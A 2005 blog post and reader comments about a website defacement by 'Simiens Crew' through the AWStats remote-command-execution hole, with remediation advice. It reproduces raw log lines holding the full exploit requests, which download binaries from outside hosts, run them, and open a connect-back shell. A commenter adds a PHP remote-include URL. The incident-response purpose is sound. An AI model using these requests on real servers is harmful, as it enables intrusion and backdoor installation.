Simiens Crew 2005 - How They Did It!

Wed, February 2, 2005 — Category: Personal

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4
One of my sites got hacked on Feb. 1, 2005, they changed the index.html and put “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”
I’ve heard people suspect both PHP vulnerabiltiy and Awstats, both of which I’m using.
I’m using PHP Version 4.3.10 and […]

Updated: Awstats 6.4 fixes even more security holes. Please upgrade to 6.4

One of my sites got hacked on Feb. 1, 2005, they changed the index.html and put “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”

I’ve heard people suspect both PHP vulnerabiltiy and Awstats, both of which I’m using.

I’m using PHP Version 4.3.10 and Advanced Web Statistics 6.1 (build 1.751) (awstats)

I just checked the awstats homepage:

“Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user “nobody”). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole.”

http://awstats.sf.net

Here’s some more info, and how I traced it down to awstats…

Here’s an excerpt from my clsearch.org log file:

tt.txt is a binary, which they ran (no idea what it
did)

system(”cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt);

and dc.zip is also a binary they download and ran:

system(”wget%20gotmoney.100free.com/dc.zip”);

An email to my provider: You also have several hacked instances on your server in /tmp, most of which are binaries, two of which are perl scripts. One of the perl scripts attempts to connect an irc server, the same server that the people who hacked my site have a channel on #simiens. I couldn’t uncompress dc.zip (which was download in my log files, but I suspect dc.pl is what it contained - who knows what else, as it was an executable binary).

Some other nefarious things in /tmp on Neureal’s server:

brk2
cgi
ct
ct.1
dc.pl
index.html (contains a meta-refresh to some japanese online shopping site )
nbot.pl
r0nin

(The source for the two Perl scripts can be found here)

To find exploitable awstats configurarion files:
find . -name awstats*.conf | xargs cat | grep ‘AllowToUpdateStatsFromBrowser=1′

Replace all those instances so it’s set to 0 instead,
otherwise your customers will be exposed, until you
upgrade awstats.

Traverse the ./logs directory looking for exploits in the log files (67.169.x.x is my own ip, we’ll weed those out with grep -v):

Here’s the attack as it happened in my log file:

200.158.37.192 - - [29/Jan/2005:13:57:05 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”/bin/ls”); HTTP/1.1″ 200 3294 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:57:11 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”uname%20-a”); HTTP/1.1″ 200 3302 “-” “Mozilla/4
.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:57:33 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt”); HTTP/1.1″ 200 3207 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:07 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;ls”); HTTP/1.1″ 200 6902 “-” “Mozilla
/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:13 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”wget”); HTTP/1.1″ 200 3302 “-” “Mozilla/4.0 (co
mpatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:32 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txt;chmod%2077
7%20tt.txt;./tt.txt); HTTP/1.1″ 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:40 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txtt); HTTP/1.
1″ 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:43 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”cd%20/tmp;wget%20protus.com.br/tt.txt); HTTP/1.1
” 200 3273 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:58:53 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”id”); HTTP/1.1″ 200 3272 “-” “Mozilla/4.0 (comp
atible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:02 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”wget%20protus.com.br/tt.txt”); HTTP/1.1″ 200 32
15 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:10 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”chmod%20777%20tt.txt”); HTTP/1.1″ 200 3215 “-”
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:15 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./tt.txt”); HTTP/1.1″ 200 3293 “-” “Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:47 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”wget%20gotmoney.100free.com/dc.zip”); HTTP/1.1″
200 3215 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:13:59:52 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”chmod%20777%20dc.zip”); HTTP/1.1″ 200 3215 “-”
“Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:00:32 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20200.204.170.225%206262″); HTTP/1.1″
200 3327 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:01:10 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20200.204.170.225%206262″); HTTP/1.1″
200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:01:46 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20200.204.170.225%205050″); HTTP/1.1″
200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”
200.158.37.192 - - [29/Jan/2005:14:02:52 -0500] “GET /cgi-bin/awstats.pl?pluginmode=:system(”./dc.zip%20www.asianashop.com%206262″); HTTP/1.
1″ 200 3334 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Hotbar4.5.3.0; .NET CLR 1.1.4322)”

REMEMBER: Always check user input when you’re coding. Restrict it to only what you deem acceptable input, ie - if it’s a phone number, use a regexp to weed out everything but digits for example in Perl:

if ($phone =~ m|^\d{3}-\d{3}-\d{4}$|g) { phone ok; }

Obviously, international phone numbers won’t work, but you get the idea. Same goes for ANYTHING you pass to the system() command, which is how they hacked this server.

This stresses the point of also keeping your software (hopefully it’s open source) up-to-date. As open source software gets discovered and patched overnight, sometimes within hours of discovery. Just try to get a corporate conglomerate to “fix” their bug and have it available to you in that amount of time (They’ll even throw in a new licensing fee in order for you to get the fix). :-)

If anyone knows how to disassemble and executable to find out what it does, you can find their code here (beware, I wouldn’t run it on my machine).

20 Comments »

242

Comment by Anonymous

February 4, 2005 @ 6:08 pm

Hi…

We *anon* just got done over with same hack..
except the f**kin looser who did it used his own webserver to upload the backdoor code from etc..

anyway.. wanted to say I greatly appreciated finding your article.. and source codes… it has helped..

nice work dude

243

Comment by LifeSteward

February 8, 2005 @ 12:33 pm

We had about a dozen hit last night. I was using AwStats 6.1 and hadn’t heard of this yet. They also deleted all the files and directories containing “log”, so I couldn’t look at the log files. Worst yet, the LOGO images and many “blog” files were deleted as well. Lots of fun.

I posted about it at my blog.

244

Comment by PoiSQueM

February 11, 2005 @ 10:35 am

Hey Chovy,

I’ve an incident here in my company too. All the users pages has been compromised and the index.html overwritten by “Simiens Crew 2005, Enquanto Houver Fome Morte Guerra Simiens Existira”.

Just complementing your nice job, I took a look on those executables and both are backdoors programs. tt.txt open an socket on port 3333 and dc.zip is a reverse shell.

I couldn’t reproduce this on my website. Any idea?
Latter…

245

Comment by Anonymous

February 19, 2005 @ 1:07 pm

My website was hit by this attack as well. Thank you very much for your quick detective work. Really appreciate it.

246

Comment by Anonymous

February 20, 2005 @ 4:37 pm

My site was hit. All index.php pages were changed. They all now have the monkey on it. Does anyone know who done this? I wished someone would prosecute them. My site deals with issues such as miscarriages, child loss, etc..
And to really kick things in the butt these losers done it at a time when my family had a loss. I hope they are able to sleep at night.

247

Comment by chovy

February 22, 2005 @ 5:59 am

Don’t take it personally, they’ve hit thousands of sites, because they were vulnerable. I don’t know exactly what the portugeuse means, but somewhere I read it had some political motivation behind it. Best thing you can do is join security announcements mailing list for your linux distro (god help you if you use Microsoft).

248

Comment by Anonymous

March 1, 2005 @ 5:04 pm

“enquanto houver fome morte guerra Simiens existira” roughly translates to “while there is hunger, death, and war, Simiens will exist.”

249

Comment by chovy

March 1, 2005 @ 7:38 pm

Hmmm….and they’re solving that problem by hacking sites. Why didn’t I think of that?

250

Comment by Anonymous

March 3, 2005 @ 12:06 pm

Hey..
if you open that
Welcome to Data Cha0s Connect Back Shell, Data Cha0s Connect Back Backdoor, lots of reference to .h files, tt.txt, dc.zip, lots of stuff.. Searching on google for “Data cha0s” finds loads of stuff about this PHP script.. Adding “hax0r” to the search finds a site defaced by “Data Cha0s”..
.. Fecking crackers..
- Ben

251

Comment by Anonymous

March 3, 2005 @ 7:49 pm

Hey, where can i download EphPod?

252

Comment by Anonymous

March 12, 2005 @ 8:47 pm

I got hacked by the bastards indec file replaced with

Simiens - Fudendo ate a orelha

I did not even have a backup

253

Comment by Anonymous

March 14, 2005 @ 9:25 am

Thank you for your info. I was also a victim of this and I found your writeup to be valuable.

- Mike

254

Comment by Anonymous

April 5, 2005 @ 1:39 pm

In my case, they only get wwwrun daemon privilegies and they can’t delete the log files. I have it all registered, the source ip, the server of wich they downloaded the tar ball to install the backdoor binaries… I am in doubt to report the case to the police.

255

Comment by chovy

April 5, 2005 @ 2:10 pm

police will do absolutely nothing. Unless you need a report for insurance purposes. They are not going to be much help to you.

Simeins is based in Brazil I believe anyway. Only thing you could do is report them to their isp, but then again, they were probably using a hacked box anyway, and it wasn’t really their IP that you’re seeing, infact it was someone else who is also a victim.

256

Comment by drtester

April 17, 2005 @ 11:05 pm

I just got hacked, and they downloadec the rootkit code from your site here, which is how I found this site. Probably not a good idea to keep the code up like this, as you might involuntarily be helping them hack more servers like mine.

257

Comment by Anonymous

June 3, 2005 @ 3:42 pm

” Hi…We *anon* just got done over with same hack..
except the f**kin looser who did it used his own webserver to upload the backdoor code from etc..”

Now that’s fukkin funny. What loosers. Talk about stupid hackers.

258

Comment by chovy

June 3, 2005 @ 4:00 pm

not the brightest folk, but how do you know it was his server?

I mean, i have the source for the rootkit on my server, and hackers are downloading it from me, I was kind of torn on whether or not to keep it up. There’s no way to really let people see it and read the source, without also giving the hackers access.

259

Comment by Anonymous

June 27, 2005 @ 7:24 pm

Just as information, “Simiens - Fudendo ate a orelha” is the portuguese for “Simiens - F*cking all the way to the ear”

260

Comment by r0nin-buttkicker

July 28, 2005 @ 2:10 pm

My server had php script like this:

www.mydomain.com/index.php?request=abc

and abc was phph scrpt that was included like this:
=======
include header.php
include $request.php
include footer.php
========

From my web logs, my site was called like:
www.mydomain.com/index.php?request=http://f58.aaa.livedoor.jp/~picapau/tool25.dat?&cmd=w

where the funny japanese site has the php script that did all the damage.